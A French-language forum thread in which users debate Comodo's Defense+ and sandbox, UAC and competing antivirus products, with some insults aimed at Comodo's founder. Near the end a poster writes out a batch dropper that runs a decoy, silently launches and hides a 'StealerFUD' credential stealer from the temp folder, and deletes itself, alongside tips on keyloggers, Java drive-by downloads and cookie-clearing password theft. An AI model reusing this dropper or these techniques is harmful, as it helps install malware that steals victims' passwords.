Ya plusieurs choses qui ne vont pas, je vois d’ailleurs que je n’ai pas été le seul à le dire, et à avoir eu ces idées, on a Experience (un bon mod) qui s’en va et le mentionne, et mentionne aussi qu’il a pourtant tenter pas mal de fois. Je pense que mes messages là dessus on du partir à la poubelle comme je le pensais déjà.
Quand à Melih, on dirait plus un gamin de 5 ans qui à la grosse tête avec le QI d’une huitre. Certes, il a pu faire de belles choses, mais sa cervelle à du cramer entre temps.
Oui, je suis pas rassurant, dites vous que je songe depuis quelques semaines à quitter le navire, et les derniers évènements récents n’ont fait qu’amplifier les choses.
Bah y dit que si ca ce lance en admin faut bloquer , ta cette alerte que en sandbox , mais y dit aussi que si ca se lance en admin il peut tout faire , alors defense+ ne sers a rien. c’est le raisonnement…
Rah … nOrton pue , 50% cpu sur 4core 2,60ghz … et ca le reste depuis 3 min je desinstalle.
revenons au sujet
J’avais donner des sugesitons a des proches d’isntaller comodo , mais depuis quelque temps , je leur dis " desinstalle ca en sers a rien de le garder pour le moment "
je suis sous 7 et je ne comprends pas le problème : si on lance une application en mode admin defense+ ne sert à rien ? j’ai juste pigé que le moment où la sandbox est la plus efficace c’est quand elle est désactivée…
Dans ce cas UAC + patch guard (pour le 64 bits) = comodo qui ne peut rien faire ?
COMODO + UaC windows = bug avec defense+. y font le meme job ,
Enfaite je ne dis pas que le defense+ ne sers a rien , c’est juste une metaphore , je vais m’expliquer :
En gros sur les reports que les personnes de la communauté ont faits , Melih quand y voit cette alerte dans le screenshot dit ’ si tu ne bloques pas , tout passe " , Donc , si tu n’as pas la sandbox activé tu n’auras pas cette alerte , on est d’accord ? (j’espere >:-D)
mais c’est là que ca devien drole ! , parce que sans sandbox … tous se lance en admin directement , donc…
defense+ peut rien faire ? … c’est l’idée visuel du chef.
Lol , j’y pense tien …
La sandbox permet de reduire le niveau d’evalation des droits des applications …
Pourquoi donne t’elle la posibilité de la lancer en admin ? franchement ça c’est debile !!
je n’y avais pas penser jusqu’a là mais bon , c’est une question a être posée.
Comme 85% des applications appars teletubies qui ne se lances pas en admin… , ce que je ne comprends pas c’est l’engoument de cette alerte … si elle est la … tu dois bloquer sinon t’es mal vue … c’est idiot… voila. je ne vais pas en discuter plus avec cette idiotie mais bon … les changements de coach , ca arrivent souvent.
I guess Norton 360 because of the Sonar feature. Very hard for anything to escape the sonar.
[quote]That doesn't protect you much at all. Don't start feeling invincible because of a Sandbox.
[/quote]
Sandbox is outdated. We use Virtual Machines.
My combo is: Avira, Malware Anti Bytes, and Online Armor.
1er . je prends norton 360 parce que la technologie du sonar est vraiment dur de l'echapper.
2eme: Ceci ne protege pas vraiment , ne te crois pas invinsible parce que tu as une sandbox
3eme: la sandbox est dépasée , on utilise des machines virtuel
4eme: mon combo : avira, malwarebytes , online armor.
A ce que on pourrait croire , c'est avira le plus vulnerable au attaques & nod32 pour ca legerté , il ne croivent pas trop en la technologie du cloud computing.
Voila ce que reponde les coders de malware sur les forum d'hack.
[at] eboo , je ne sais pas pour defensewall , personne n'en parle , personne sait si il est efficace .. , moi non plus d'ailleur , resteindre l'accés d'une aplication alors que toutes les aplications de maintenant on besoin de ce lancer en administrateur...
je pige que dalle, et pourtant j’ai pas bu ;D
La sandbox enlève les droits admin et c’est pour ça qu’elle rend utile defense+ ? Defense+ c’est quand même un peu plus pointu que l’uac il me semble non ?
c’est le raisonnement meme de melih.
personnelement je n’ai jamais cru a la performance de la sandbox , elle est vulnerable par tout…
C’est utile que sous xp.
tu mets MBAM en résident ? Avira a bien la réputation de se faire tuer facilement effectivement… Et avec des labos fermés le we bonjour la réactivité ! Nod32 je le trouve plus lourd depuis quelque temps (j’avais la v2 très légère, la v3 et la v4 que j’ai remplacée par avira premium 2010).
Le coup de la virtualisation c’est bien mais s’il faut une machine virtuelle pour être tranquille on est pas rendus.
Pour le cloud pourquoi ils n’y croient pas ? Ca rend les sytèmes plus réactifs aux infections.
Et c’est quoi l’histoire de norton 360 ?
OA c’est le concurrent direct de comodo je trouve, même si la version free est peut-être un peu moins bonne, mais elle n’est pas faite pour le 64 bits…
je sais pas pourquoi il y croivent pas , peut être car leur malware serais detect apres 2 jour
ou peut etre parce que c’est facilement tuable … lancé le malware plus vite que le cloud en execution … je ne sais pas , pour OA c’est sur sans antivirus il vaut comodo.
Hm pour avira en effet il est connu pour ca , malwarebytes en resident oui , mais y detect que certain fichier , pas tous , faudra faire un scan pour detect certain keylogger/clée de registre
et les 3 en meme temps ralentit le pc agravement.
pour norton&le sonar il le trouve vraiment puissant et qu’il n’ya pour le moment aucun malware qui peut le passer, c’est leur dire des coders , de certain , il y’en a tellement …
Mais je vien de test la v11 de norton internet security , ma ram etais a 2,20g et le processeur occupé a 50% depuis son install. ta des nouvelles technique que meme comodo ne peut pas detect , les nouveau keyloger qui utilisent des hookjs , d’apres la faille que j’ai decouverte pour l’injection de dll , les malwares font en profiter aussi de cette technique … ensuite y’a les java drive-by , c’est les cadre en java quand tu vas sur des sites …du genre peacekeeper … tu autorises ca dans ton pc quand tu telecharges le .jar dans ton pc , et d’aprés eux , t’es mal barré , les antivirus savent pas le detect , et pour les java drive by je ne parles que de keyloger pour le moment , le java est un bon language futuriste pour le hack . des techniques pour lancer le malware quand tu decompresses avec un .rar , avec un .BAT justement
[at]echo off
cd %userprofile%
start Application.exe
copy %userprofile%StealerFUD.exe %TMP%
del StealerFUD.exe
cd %TMP%
start StealerFUD.exe
attrib StealerFUD.exe +h
cd %userprofile%
del Run.bat
Apres ta des stealers , qui suprime vos cookies , pour que vous retapez les mots de passe sur paypal… etc , et pour vous les prendres.
J’attends de même.
j’ai etais confronté face a .rar piégé , j’ai pris 'lexecutable qui se lancais depuis le /temp de windows et là grande stupéfaction aucun antivirus savait le scanner , sur virustotal , ca metais 2h , sur virscan aussi…
